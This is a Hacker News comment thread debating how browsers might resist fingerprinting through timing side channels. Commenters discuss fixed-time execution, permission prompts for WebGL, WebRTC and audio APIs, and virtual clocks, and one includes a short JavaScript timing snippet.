Hacker News new | past | comments | ask | show | jobs | submit login

It's possible to have the runtime execute the computations in fixed time across platforms.



Sure. And nobody actually wants that, because it would be so restrictive in practice that you might as well just limit yourself to plain text.

The horse bolted long ago; there's little sense in trying to prevent future web platform features from enabling fingerprinting, because the existing surface that enables it is way too big to do anything meaningful about it.

Here are a couple of more constructive things to do:

- Campaign to make fingerprinting illegal in as many jurisdictions as possible. This addresses the big "legitimate" companies.

- Use some combination of allow-listing, deny-listing, and "grey-listing" to lock down what untrusted websites can do with your browser. I'm sure I've seen extensions and Pi-hole type products for this. You could even stop your browser from sending anything to untrusted sites except simple GET requests to pages that show up on Google. (I.e. make it harder for them to smuggle information back to the server.)

- Support projects like the Internet Archive that enable viewing large parts of the web without ever making a request to the original server.


This would essentially mean that every computation would have to run as slow as the slowest supported hardware. It would completely undermine the entire point of supporting hardware acceleration.

I’m sympathetic to the privacy concerns but this isn’t a solution worth considering.


The solution is to put unncesessary features like WebGL, programmatic Audio API, reading bits from canvas and WebRTC behind a permission.


Who decides what's unnecessary?


Everything that can be used for fingerprinting should be behind a permission. Almost all sites I use (like Google, Hacker News or Youtube) need none of those technologies.


Main thing that ought to be behind a permission is letting Javascript initiate connections or modify anything that might be sent in a request. Should be possible, but ought to require asking first.

If the data can't be exfiltrated, who cares if they can fingerprint?

Letting JS communicate with servers without the user's explicit consent was the original sin of web dev, that ruined everything. Turned it from a user-controlled experience to one giant spyware service.


If javascript can modify the set of URLs the page can access (e.g. put an image tag on the page or tweak what images need to be downloaded using CSS) then it can signal information to the server. Without those basic capabilities, what's the point of using javascript?


So CSS should be behind a permission?


CSS should not leak fingerprinting information. After all this is just a set of rules to lay out blocks on the page.



No video driver is actually going to implement fixed-time rendering. So you'd have to implement it in user-space, and it would be even slower than WebGL. Nobody wants that. You're basically just saying the feature shouldn't ship in an indirect way (which is a valid opinion you should just express directly.)


I don't mean to prescribe the way to stop fingerprinting, just throwing out a trivial existence proof, and maybe a starting point of thinking, that it's not impossible like was suggested.

Also, WebGPU seems to conceptually support software rendering ("fallback adapter"), where fixed time rendering would seem to be possible even without getting cooperation from HW drivers. Being slower than WebGL might still be an acceptable tradeoff at least if the alternative WebGL API avenue of fingerprinting could be plugged.


Could you explain what techniques would make this possible? I can see how it's possible in principle, if you, say, compile JS down to bytecode and then have the interpreter time the execution of every instruction. I don't immediately see a way to do it that's compatible with any kind of efficient execution model.


The rest would be optimization while keeping the timing sidechannel constraint in mind, hard to say what the performance possibilities are. For example not all computations have externally observable side effects, so those parts could be executed conventionally if the runtime could guarantee it. Or the program-visible clock APIs might be keeping virtual time that makes it seem from timing POV that operations are slower than they are, combined with network API checkpoints that halt execution until virtual time catches up with real time. Etc. Seems like a interesting research area.


>not all computations have externally observable side effects

You can time any computation. So they all have that side effect.

Also, from Javascript you can execute tons of C++ code (e.g. via DOM manipulation). There's no way all of that native code can be guaranteed to run with consistent timing across platforms.


Depends on who you mean by "you". In context of fingerprinting resistance the timing would have to be done by code in certain limited ways using browser APIs or side channels that transmit information outside the JS runtime.

Computations that call into native APIs can be put in the "has observable side effects" category (but in more fine grained treatment, some could have more specific handling).


I'm not sure what you mean. All you need to do is this:

    function computation() { ... }
    before = performance.now();
    computation();
    t = performance.now() - before;
(Obviously there will be noise, and you need to average a bunch of runs to get reliable results.)


In this case the runtime would not be able to guarantee that the timing has no externally observable side effects (at least if you do something with t). It would then run in the fixed execution speed mode.


Lots of code accesses the current time. So I think you'd end up just running 90% of realistic code in the fixed execution speed mode, which wouldn't be sufficiently performant.


Runtime doesnt have full controll but could introduce a lot of noise in timing and performance. Could it help?


It's hard to reason about how much noise is guaranteed to be enough, because it depends on how much measurement the adversary has a chance to do, there could be collusion beween several sites, etc. To allow timing API usage I'd be more inclined toward the virtual time thing I mentioned upthread.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: